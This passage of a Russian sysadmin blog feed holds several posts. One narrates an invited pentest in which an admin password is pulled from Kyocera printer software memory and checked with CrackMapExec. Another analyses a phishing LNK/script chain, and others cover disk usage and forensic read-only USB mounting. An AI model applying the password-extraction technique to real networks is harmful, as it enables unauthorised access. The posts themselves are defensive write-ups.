<li>Получим информацию о быстрой миграции с программ класса UTM и NGFW и комплексном обеспечении информационной безопасности.</li>
<li>Рассмотрим функциональные возможности ИКС и главные преимущества решения.</li>
<li>Также узнаем, как легко перейти на универсальное российское ПО, защитить корпоративную сеть от всех типов угроз и эффективно закрывать ИТ-задачи компании.</li>
</ol>
<p><a href="https://litl-admin.ru/wp-content/uploads/2023/10/2023-10-12_20-14-54.jpg" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7480" src="https://litl-admin.ru/wp-content/uploads/2023/10/2023-10-12_20-14-54-620x349.jpg" alt="" width="620" height="349" srcset="https://litl-admin.ru/wp-content/uploads/2023/10/2023-10-12_20-14-54-620x349.jpg 620w, https://litl-admin.ru/wp-content/uploads/2023/10/2023-10-12_20-14-54-940x529.jpg 940w, https://litl-admin.ru/wp-content/uploads/2023/10/2023-10-12_20-14-54-768x432.jpg 768w, https://litl-admin.ru/wp-content/uploads/2023/10/2023-10-12_20-14-54.jpg 1025w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="349"></span></a></p>
<p>Ну а по содержанию вебинара &#8211; будет полезно прежде всего тем, кто обеспокоен импортозамещением и интеграцией отечественного ПО. То есть чуть менее, чем все) В любом случае это может быть полезно &#8211; узнать, что происходит в секторе, позадавать вопросы и закрыть какие-то возможные белые пятна. Побольше бы таких мероприятий.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://litl-admin.ru/novosti/priglashenie-na-vebinar-ot-iks.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			<dc:creator>Seqular</dc:creator></item>
		<item>
		<title>И в очередной раз Kyocera сдала пароль администратора)</title>
		<link>https://litl-admin.ru/xaking/i-v-ocherednoj-raz-kyocera-sdala-parol-administratora.html</link>
					<comments>https://litl-admin.ru/xaking/i-v-ocherednoj-raz-kyocera-sdala-parol-administratora.html#comments</comments>
		
		
		<pubDate>Thu, 23 Feb 2023 03:14:27 +0000</pubDate>
				<category><![CDATA[Хакинг]]></category>
		<guid isPermaLink="false">https://litl-admin.ru/?p=7459</guid>

					<description><![CDATA[Пригласил меня как-то товарищ проверить состояние защищённости в своей организации. Праздное любопытство родилось из посыла, что &#8220;да любая &#8220;баба Нюра из бухгалтерии&#8221; может залезть в комп директора при желании и небольшой проф.переподготовки.&#8221;. Для чистоты эксперимента решено было использовать только мисконфиг, без боевых эксплойтов, например, против бородатой MS17-010. Тем более, что по заверениям приятеля всё это [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Пригласил меня как-то товарищ проверить состояние защищённости в своей организации. Праздное любопытство родилось из посыла, что &#8220;<em>да любая &#8220;баба Нюра из бухгалтерии&#8221; может залезть в комп директора при желании и небольшой проф.переподготовки</em>.&#8221;.</p>
<p>Для чистоты эксперимента решено было использовать только мисконфиг, без боевых эксплойтов, например, против бородатой MS17-010. Тем более, что по заверениям приятеля всё это они уже давно пропатчили.</p>
<p>Итак, погнали! Я не буду описывать полный кейс, лишь хочу отметить, что некогда описывал один вектор как нечто весьма спецефичное. Но, как выяснилось, это ни капли не единичный сценарий.</p>
<p>Описывалось тут:</p>
<blockquote class="wp-embedded-content" data-secret="KZJmkfujer"><p><a href="https://litl-admin.ru/xaking/kak-opasnye-nastrojki-mfu-pomogli-poluchit-privilegii-administratora.html">Как опасные настройки МФУ помогли получить привилегии администратора</a></p></blockquote>
<p><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" title="&#8220;Как опасные настройки МФУ помогли получить привилегии администратора&#8221; &#8212; Litl-Admin.ru" src="https://litl-admin.ru/xaking/kak-opasnye-nastrojki-mfu-pomogli-poluchit-privilegii-administratora.html/embed#?secret=I4ugMItTI5#?secret=KZJmkfujer" data-secret="KZJmkfujer" width="600" height="338" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"></iframe></p>
<p>Кейс повторился &#8220;с точностью до муллиметра&#8221;. В ходе инвентаризации был обнаружен ряд МФУ небезызвестной марки.</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2023/02/photo_1_2023-02-23_13-26-32-2.jpg" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-full wp-image-7460" src="https://litl-admin.ru/wp-content/uploads/2023/02/photo_1_2023-02-23_13-26-32-2.jpg" alt="" width="524" height="429" /><meta itemprop="width" content="524"><meta itemprop="height" content="429"></span></a></p>
<p>Как всегда &#8211; дефолтный пароль. Иду в адресную книгу и вижу:</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2023/02/photo_7_2023-02-23_13-26-32.jpg" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-full wp-image-7461" src="https://litl-admin.ru/wp-content/uploads/2023/02/photo_7_2023-02-23_13-26-32.jpg" alt="" width="407" height="229" /><meta itemprop="width" content="407"><meta itemprop="height" content="229"></span></a>Создан какой-то адрес. Уже ручки зачесались поскорее посмотреть, что там вбито.</p>
<p>Традиционно &#8211; общий каталог, учётка и пароль (вытащить который из веб-интерфейса не представлялось возможным). Смутило (а точнее заинтересовало) то, что учётка оканчивалась на многообещающее &#8220;&#8230;.admin&#8221;. Не, ну конечно, может быть заведено что-то типа &#8220;scan-admin&#8221;, общая учётная запись, прав у которой хватает лишь на то, чтобы записывать в общий каталог на сервере. Это было бы вполне себе нормально, думаю.</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2023/02/photo_10_2023-02-23_13-26-32.jpg" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-full wp-image-7462" src="https://litl-admin.ru/wp-content/uploads/2023/02/photo_10_2023-02-23_13-26-32.jpg" alt="" width="400" height="535" /><meta itemprop="width" content="400"><meta itemprop="height" content="535"></span></a>Качаем с Интернета Kyocera Net Viewer, коннектимся к нашей МФУшке.</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2023/02/photo_2_2023-02-23_13-26-32.jpg" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7463" src="https://litl-admin.ru/wp-content/uploads/2023/02/photo_2_2023-02-23_13-26-32-620x305.jpg" alt="" width="620" height="305" srcset="https://litl-admin.ru/wp-content/uploads/2023/02/photo_2_2023-02-23_13-26-32-620x305.jpg 620w, https://litl-admin.ru/wp-content/uploads/2023/02/photo_2_2023-02-23_13-26-32.jpg 626w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="305"></span></a>Радость в том, что теперь пароль в оперативной памяти процесса, откуда его можно поддёрнуть уже известными средствами. Уже известные средства у меня под рукой не оказались. Но тут я вспомнил, что достаточно неплохой Hex есть в программке, знакомой моему поколению геймеров &#8211; ArtMoney. Качаем, запускаем. Подключаемся к процессу KYOCERA Net Viewer и ищем строковую переменную с именем пользователя.</p>
<p>Нашлось с десяток вхождений. Будем открывать каждое и смотреть, подходит ли оно визуально под XML-структуру.</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2023/02/photo_4_2023-02-23_13-26-32.jpg" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-full wp-image-7464" src="https://litl-admin.ru/wp-content/uploads/2023/02/photo_4_2023-02-23_13-26-32.jpg" alt="" width="415" height="523" /><meta itemprop="width" content="415"><meta itemprop="height" content="523"></span></a>На втором же вхождении видим примерно следующее:</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2023/02/photo_8_2023-02-23_13-26-32.jpg" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter wp-image-7465 size-large" src="https://litl-admin.ru/wp-content/uploads/2023/02/photo_8_2023-02-23_13-26-32-940x688.jpg" alt="" width="700" height="512" srcset="https://litl-admin.ru/wp-content/uploads/2023/02/photo_8_2023-02-23_13-26-32-940x688.jpg 940w, https://litl-admin.ru/wp-content/uploads/2023/02/photo_8_2023-02-23_13-26-32-620x454.jpg 620w, https://litl-admin.ru/wp-content/uploads/2023/02/photo_8_2023-02-23_13-26-32-768x562.jpg 768w, https://litl-admin.ru/wp-content/uploads/2023/02/photo_8_2023-02-23_13-26-32.jpg 1092w" sizes="(max-width: 700px) 100vw, 700px" /><meta itemprop="width" content="700"><meta itemprop="height" content="512"></span></a>И как всегда, пароль в открытом виде. Копируем, проверяем права на шаре при помощи CrackMapExec. И &#8230;. бум! Видим заветное (Pwn3d!). То есть на шаре имеем права локального администратора (а также не только на этом хосте, но и на многих других). Пока не в домене. Но и этого вполне достаточно. Открываю проводник от имени этой учётной записи и лезу к своему товарищу на рабочий стол. ))</p>
<p>Дальше мы решили раскрутить темку, посмотреть как далеко может зайти изначально непривилегированный пользователь. Ну а пока &#8211; некоторые выводы.</p>
<h2>Некоторые выводы</h2>
<ol>
<li>То, что раньше казалось единичным кейсом &#8211; вполне может быть широко распространённой практикой.</li>
<li>Прописывать в принтера или куда-либо ещё админские учётки &#8211; плохо. Сделайте отдельного пользователя (нескольких, в группу) и этой группе нарежьте минимально необходимые привилегии.</li>
<li>Дефолтные логин-пароль в принетре/МФУ &#8211; плохо. Все массовые сканеры проверяют их со скоростью пули. А если кажется, что во взломе МФУ нет ничего страшного &#8211; то уж как минимум временный вывод из строя печатающего устройства &#8211; это может стать настоящей головной болью, для решения которой придётся потопать ножками (по сети уже может не войдёте).</li>
<li>Подручные инструменты вроде того же ArtMoney вполне сойдут за Hex-редактор )) Just for fun.</li>
<li>Без сильной необходимости вообще вывешивать административный интерфейс какого-либо оборудования в ту же сеть не надо. Вопрос времени, когда его сломают.</li>
</ol>
]]></content:encoded>
					
					<wfw:commentRss>https://litl-admin.ru/xaking/i-v-ocherednoj-raz-kyocera-sdala-parol-administratora.html/feed</wfw:commentRss>
			<slash:comments>5</slash:comments>
		
		
			<dc:creator>Seqular</dc:creator></item>
		<item>
		<title>Как узнать что занимает место на диске?</title>
		<link>https://litl-admin.ru/utility/kak-uznat-chto-zanimaet-mesto-na-diske.html</link>
					<comments>https://litl-admin.ru/utility/kak-uznat-chto-zanimaet-mesto-na-diske.html#respond</comments>
		
		
		<pubDate>Wed, 08 Feb 2023 05:16:42 +0000</pubDate>
				<category><![CDATA[Утилиты]]></category>
		<guid isPermaLink="false">https://litl-admin.ru/?p=7454</guid>

					<description><![CDATA[В очередной раз получив сообщение о том, что &#8220;на диске C: заканчивается свободное место&#8221; я наконец решил &#8220;прибраться&#8221;. Но как узнать, где сосредоточено наибольшее количество наименее нужных файлов? (Корзина же, да?) На помощь пришла старенькая, миниатюрная (около 600 Кб), но от этого не менее функциональная программа: WinDirStat. При запуске выдаёт окно, в котором можно выбрать [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>В очередной раз получив сообщение о том, что &#8220;<em>на диске C: заканчивается свободное место</em>&#8221; я наконец решил &#8220;прибраться&#8221;. Но как узнать, где сосредоточено наибольшее количество наименее нужных файлов? (Корзина же, да?)</p>
<p>На помощь пришла старенькая, миниатюрная (около 600 Кб), но от этого не менее функциональная программа: <strong>WinDirStat</strong>.</p>
<p>При запуске выдаёт окно, в котором можно выбрать определённый локальный диск (или даже конкретный каталог).</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2023/02/2023-02-08_16-04-56.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-full wp-image-7455" src="https://litl-admin.ru/wp-content/uploads/2023/02/2023-02-08_16-04-56.png" alt="" width="466" height="378" /><meta itemprop="width" content="466"><meta itemprop="height" content="378"></span></a>После этого программа начинает рекурсивное сканирование диска и достаточно быстро нарисует вот такую наглядную картинку:</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2023/02/2023-02-08_16-10-33.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7456" src="https://litl-admin.ru/wp-content/uploads/2023/02/2023-02-08_16-10-33-620x496.png" alt="" width="620" height="496" srcset="https://litl-admin.ru/wp-content/uploads/2023/02/2023-02-08_16-10-33-620x496.png 620w, https://litl-admin.ru/wp-content/uploads/2023/02/2023-02-08_16-10-33-940x751.png 940w, https://litl-admin.ru/wp-content/uploads/2023/02/2023-02-08_16-10-33-768x614.png 768w, https://litl-admin.ru/wp-content/uploads/2023/02/2023-02-08_16-10-33.png 1281w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="496"></span></a>Соответственно, чем больше по размеру прямоугольник &#8211; тем больше он отъедает свободного места. Всё кликабельно &#8211; справа есть категорирование по типам файлов, слева вверху &#8211; по каталогам.</p>
<p>Действуем согласно <em>правилу Парето</em>: удаляем наибольшие по объёму наименее нужные файлы, прям там же из контекстного меню.</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2023/02/2023-02-08_16-14-39.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7457" src="https://litl-admin.ru/wp-content/uploads/2023/02/2023-02-08_16-14-39-620x291.png" alt="" width="620" height="291" srcset="https://litl-admin.ru/wp-content/uploads/2023/02/2023-02-08_16-14-39-620x291.png 620w, https://litl-admin.ru/wp-content/uploads/2023/02/2023-02-08_16-14-39.png 631w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="291"></span></a>За считанные минуты можно освободить большое количество дискового пространства, да и просто наконец найти что-то &#8220;тяжелое&#8221;, что потерял когда-то)</p>
]]></content:encoded>
					
					<wfw:commentRss>https://litl-admin.ru/utility/kak-uznat-chto-zanimaet-mesto-na-diske.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			<dc:creator>Seqular</dc:creator></item>
		<item>
		<title>Опасное PNG-вложение в почту</title>
		<link>https://litl-admin.ru/bezopasnost/opasnoe-png-vlozhenie-v-pochtu.html</link>
					<comments>https://litl-admin.ru/bezopasnost/opasnoe-png-vlozhenie-v-pochtu.html#respond</comments>
		
		
		<pubDate>Fri, 23 Dec 2022 09:38:50 +0000</pubDate>
				<category><![CDATA[Безопасность]]></category>
		<guid isPermaLink="false">https://litl-admin.ru/?p=7446</guid>

					<description><![CDATA[Написал буквально на днях друг, говорит: &#8211; &#8230;прислали письмо подозрительное, во вложении 7z архив с паролем. Пароль в том же письме) Ну быстро смекнув, что к чему, говорю &#8211; открой архив, всё нормально, можно смело запускать любые вложения из-под админа и с отключеным антивирусом. 😈 Посмеялись, но через пару минут он пишет &#8211; а внутри [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Написал буквально на днях друг, говорит:</p>
<p>&#8211; &#8230;прислали письмо подозрительное, во вложении 7z архив с паролем. Пароль в том же письме)</p>
<p>Ну быстро смекнув, что к чему, говорю &#8211; открой архив, всё нормально, можно смело запускать любые вложения из-под админа и с отключеным антивирусом. <img src="https://s.w.org/images/core/emoji/14.0.0/72x72/1f608.png" alt="😈" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Посмеялись, но через пару минут он пишет &#8211; а внутри действительно только PNG-изображение.</p>
<p>&#8211; <img src="https://s.w.org/images/core/emoji/14.0.0/72x72/1f928.png" alt="🤨" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Чё?</p>
<p>Не, я конечно писал уже про <a title="Склейка архива и фотографии или вспоминаем о RARJPEG" href="https://litl-admin.ru/xaking/sklejka-arxiva-fotografii-ili-vspominaem-o-rarjpeg.html" target="_blank" rel="noopener">RARJPEG</a> и возможность <a title="Стеганография – как спрятать документы внутри аудиофайла" href="https://litl-admin.ru/utility/steganografiya-kak-spryatat-dokumenty-vnutri-audiofajla.html" target="_blank" rel="noopener">упаковать в медиафайлы что-то</a>, помимо самого медиа. Но тут PNG.</p>
<p>А точно ничего больше нет? &#8211; мысленно уже напрягся, думал, может какой зиродей в просмотрщике штатном проморгали&#8230;.</p>
<p>&#8211; ну ещё ярлык.</p>
<p>Фуффф&#8230;. В нём дело. &#8211; Скинь свойства:</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/12/la1.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-full wp-image-7447" src="https://litl-admin.ru/wp-content/uploads/2022/12/la1.png" alt="" width="443" height="578" /><meta itemprop="width" content="443"><meta itemprop="height" content="578"></span></a></p>
<p>Понятно) Вообще можно не привязываться было к (якобы) безобидности формата PNG &#8211; он тут совсем не при чём. Просто тушка скрипта исполняется встроенным интерпретатором серверных сценариев CScript. Не так, чтобы часто встречалось. Запросил копию письма, смотрю сам, что в архиве:</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/12/la2.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7448" src="https://litl-admin.ru/wp-content/uploads/2022/12/la2-620x155.png" alt="" width="620" height="155" srcset="https://litl-admin.ru/wp-content/uploads/2022/12/la2-620x155.png 620w, https://litl-admin.ru/wp-content/uploads/2022/12/la2.png 629w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="155"></span></a>Открываем редактором PNG-шку:</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/12/la3.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7449" src="https://litl-admin.ru/wp-content/uploads/2022/12/la3-620x306.png" alt="" width="620" height="306" srcset="https://litl-admin.ru/wp-content/uploads/2022/12/la3-620x306.png 620w, https://litl-admin.ru/wp-content/uploads/2022/12/la3-940x464.png 940w, https://litl-admin.ru/wp-content/uploads/2022/12/la3-768x379.png 768w, https://litl-admin.ru/wp-content/uploads/2022/12/la3-1536x758.png 1536w, https://litl-admin.ru/wp-content/uploads/2022/12/la3.png 1920w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="306"></span></a></p>
<p>Мда. Типичный скрипт. А внизу целая простыня из закодированного (не base64, а кастомный алгоритм) содержимого. Лень разбираться в блокноте, загнал все функции и пейлод в консоль браузера Chrome, там выполнил в JS.VM и вывел раскодированный пейлод в консоль:</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/12/la4.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7450" src="https://litl-admin.ru/wp-content/uploads/2022/12/la4-620x477.png" alt="" width="620" height="477" srcset="https://litl-admin.ru/wp-content/uploads/2022/12/la4-620x477.png 620w, https://litl-admin.ru/wp-content/uploads/2022/12/la4-940x723.png 940w, https://litl-admin.ru/wp-content/uploads/2022/12/la4-768x590.png 768w, https://litl-admin.ru/wp-content/uploads/2022/12/la4.png 1280w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="477"></span></a>Тут уже VBScript, который паковался бы в созданную книгу Excel на одном из предыдущих этапов.</p>
<p>В VBS-е тоже кодированый EXE-шник, импорт функций для аллокейта памяти и создания процессов, куда передаётся этот пейлод. Кароче уже не так интересно, но всё-таки любопытно:</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/12/la5.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7451" src="https://litl-admin.ru/wp-content/uploads/2022/12/la5-620x477.png" alt="" width="620" height="477" srcset="https://litl-admin.ru/wp-content/uploads/2022/12/la5-620x477.png 620w, https://litl-admin.ru/wp-content/uploads/2022/12/la5-940x723.png 940w, https://litl-admin.ru/wp-content/uploads/2022/12/la5-768x590.png 768w, https://litl-admin.ru/wp-content/uploads/2022/12/la5.png 1280w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="477"></span></a>Можно чуть дальше шагнуть, перевести десятичные значения в хекс и в бинарный формат, получить тело вредоноса. Может быть в свободное время займусь. Но там не просто тупо EXE, так как не увидел характерную сигнатуру MZ&#8230; в начале. Хотя может там есть какой-нибудь шаффл или сдвиг, или ксор, да мало ли что ещё)</p>
<h2>Выводы:</h2>
<ol>
<li>Большинство вторжений в организации начинается именно с пробития периметра через электронную почту. Это нужно помнить.</li>
<li>Даже, если в письме нет EXE-файла, там всё ещё может быть вредоносный скрипт, который соберёт сам себя, используя встроенные средства.</li>
<li>В случае, подобном этому, в качестве хранилища скрипта мог быть использоваться и совсем безобидный файл &#8211; хоть TXT (хотя палево, легко открыть), расширение роли не играет &#8211; он выступает только в качестве контейнера.</li>
<li>Возможно имеет смысл ограничить работу CScript/WScript у себя, кто-то вообще легитимно использует их возможности?</li>
<li>Самое опасное &#8211; ярлык) Вообще там могло быть что угодно, поэтому запускать ярлык даже с безобидной иконкой (paint) не стоит.</li>
</ol>
<p>Что думаете?</p>
<p>&nbsp;</p>
]]></content:encoded>
					
					<wfw:commentRss>https://litl-admin.ru/bezopasnost/opasnoe-png-vlozhenie-v-pochtu.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			<dc:creator>Seqular</dc:creator></item>
		<item>
		<title>Как подключить флешку в режиме “только чтение”</title>
		<link>https://litl-admin.ru/bezopasnost/kak-podklyuchit-fleshku-v-rezhime-tolko-chtenie.html</link>
					<comments>https://litl-admin.ru/bezopasnost/kak-podklyuchit-fleshku-v-rezhime-tolko-chtenie.html#respond</comments>
		
		
		<pubDate>Tue, 13 Dec 2022 00:48:15 +0000</pubDate>
				<category><![CDATA[Безопасность]]></category>
		<guid isPermaLink="false">https://litl-admin.ru/?p=7437</guid>

					<description><![CDATA[Возникают задачи, требующие чтения USB-флешек так, чтобы исключить запись на указанные накопители какой-либо информации. Например, с целью проведения криминалистических исследований. Во время штатной работы, операционная система может немного &#8220;намусорить&#8221; на подключенный носитель и исказить данные, будь то временные метки или дополнительные служебные файлы  (каталоги). Нам это не нужно, хотим только читать. Как же обеспечить такое [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Возникают задачи, требующие чтения USB-флешек так, чтобы исключить запись на указанные накопители какой-либо информации. Например, с целью проведения криминалистических исследований. Во время штатной работы, операционная система может немного &#8220;намусорить&#8221; на подключенный носитель и исказить данные, будь то временные метки или дополнительные служебные файлы  (каталоги). Нам это не нужно, хотим только читать.</p>
<p>Как же обеспечить такое подключение?</p>
<h2>Программные средства</h2>
<p>Не буду описывать все возможные варианты, их конечно бесчисленное множество. Расскажу именно о тех, с которыми работал лично.</p>
<h3>Linux Deft (варианты v5, Zero, <img src="https://litl-admin.ru/wp-content/themes/root/images/smilies/cool.png" alt="8)" class="wp-smiley" style="height: 1em; max-height: 1em;" /></h3>
<p>Дистрибутив LiveCD Linux для криминалистических исследований (один из многих). Отличительной особенностью является включенная блокировка записи на подключаемые накопители &#8220;из коробки&#8221;. То есть подключите флешку или диск &#8211; записать на них ничего не получится, только читать. Принудительно, для определенного устройства эту защиту можно выключить (ну а иначе не получилось бы снимать образ флешки на какой-нибудь внешний USB-HDD).</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/12/deft0.jpg" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7439" src="https://litl-admin.ru/wp-content/uploads/2022/12/deft0-620x465.jpg" alt="" width="620" height="465" srcset="https://litl-admin.ru/wp-content/uploads/2022/12/deft0-620x465.jpg 620w, https://litl-admin.ru/wp-content/uploads/2022/12/deft0-768x576.jpg 768w, https://litl-admin.ru/wp-content/uploads/2022/12/deft0.jpg 800w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="465"></span></a>Дальше &#8211; подключаем флешку и в проводнике видим следующие варианты:</p>
<ol>
<li>Monut Volume &#8211; монтирование в R/W режиме (опасно). В этот режим переводим свой накопитель, на который нужно поместить образ.</li>
<li>Mount in protected mode (Read Only) &#8211; по определению.</li>
</ol>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/12/deft.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7441" src="https://litl-admin.ru/wp-content/uploads/2022/12/deft-620x465.png" alt="" width="620" height="465" srcset="https://litl-admin.ru/wp-content/uploads/2022/12/deft-620x465.png 620w, https://litl-admin.ru/wp-content/uploads/2022/12/deft-768x576.png 768w, https://litl-admin.ru/wp-content/uploads/2022/12/deft.png 800w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="465"></span></a>После того, как флешка подмонтирована &#8211; идём уже по известному пути:</p>
<p><code># dd if=/dev/... of=...</code></p>
<p>либо, что мне больше нравится &#8211; <code>ddrescue</code></p>
<div style="clear:both; margin-top:0em; margin-bottom:1em;"><a href="https://litl-admin.ru/utility/kopiruem-povrezhdyonnyj-nakopitel-s-pomoshhyu-ddrescue.html" target="_blank" class="IRPP_minimalist"><style> .IRPP_minimalist { padding:0px; margin: 0; padding-top:1em!important; padding-bottom:1em!important; width:100%; display: block; font-weight:bold; background-color:#eaeaea; border:0!important; border-left:4px solid #34495E!important; box-shadow: 0 1px 2px rgba(0, 0, 0, 0.17); -moz-box-shadow: 0 1px 2px rgba(0, 0, 0, 0.17); -o-box-shadow: 0 1px 2px rgba(0, 0, 0, 0.17); -webkit-box-shadow: 0 1px 2px rgba(0, 0, 0, 0.17); text-decoration:none; } .IRPP_minimalist:active, .IRPP_minimalist:hover { opacity: 1; transition: opacity 250ms; webkit-transition: opacity 250ms; text-decoration:none; } .IRPP_minimalist { transition: background-color 250ms; webkit-transition: background-color 250ms; opacity: 1; transition: opacity 250ms; webkit-transition: opacity 250ms; } .IRPP_minimalist .ctaText { font-weight:bold; color:inherit; text-decoration:none; font-size: 16px; } .IRPP_minimalist .postTitle { color:#000000; text-decoration: underline!important; font-size: 16px; } .IRPP_minimalist:hover .postTitle { text-decoration: underline!important; } </style><div style="padding-left:1em; padding-right:1em;"><span class="ctaText">Читать подробнее: </span>&nbsp; <span class="postTitle">Копируем повреждённый накопитель с помощью ddrescue</span></div></a></div>
<h3>Windows</h3>
<p>Создаём раздел реестра (если нет):</p>
<p><code>HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\RemovableStorageDevices\{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\</code></p>
<p>Создаём параметр: <b><code>Deny_Write</code> </b>(Dword32)<b> = 1</b></p>
<p>Перезагружаем систему (вопреки расхожему мнению, что мол, будет работать сразу).</p>
<p>Подключаем накопитель и пробуем записать (или удалить) с него что-нибудь:</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/12/windows.jpg" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7442" src="https://litl-admin.ru/wp-content/uploads/2022/12/windows-620x496.jpg" alt="" width="620" height="496" srcset="https://litl-admin.ru/wp-content/uploads/2022/12/windows-620x496.jpg 620w, https://litl-admin.ru/wp-content/uploads/2022/12/windows-940x752.jpg 940w, https://litl-admin.ru/wp-content/uploads/2022/12/windows-768x614.jpg 768w, https://litl-admin.ru/wp-content/uploads/2022/12/windows.jpg 1024w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="496"></span></a></p>
<p>Ну и дальше снимаем образ флешки или что мы там ещё хотели делать? Кстати, упомянутая ddrescue есть и под Windows (проект Cygwin), запилю как-нибудь статейку отдельную.</p>
<h2>Аппаратные средства</h2>
<p>Вот тут начинается самое интересное &#8211; наибольшей защитой (кмк) обладают именно аппаратные средства, блокирующие операции записи на уровне встроенного контроллера.</p>
<p>Например вот такое:</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/12/tableu2.jpg" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7443" src="https://litl-admin.ru/wp-content/uploads/2022/12/tableu2-620x329.jpg" alt="" width="620" height="329" srcset="https://litl-admin.ru/wp-content/uploads/2022/12/tableu2-620x329.jpg 620w, https://litl-admin.ru/wp-content/uploads/2022/12/tableu2-940x499.jpg 940w, https://litl-admin.ru/wp-content/uploads/2022/12/tableu2-768x407.jpg 768w, https://litl-admin.ru/wp-content/uploads/2022/12/tableu2.jpg 1114w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="329"></span></a>Взял поиграться)</p>
<p>Работает просто &#8211; подключаем флешку, подключаем к хосту, даём питание &#8211; и на хост прокидывается эта флешка в режиме &#8220;только чтение&#8221;.</p>
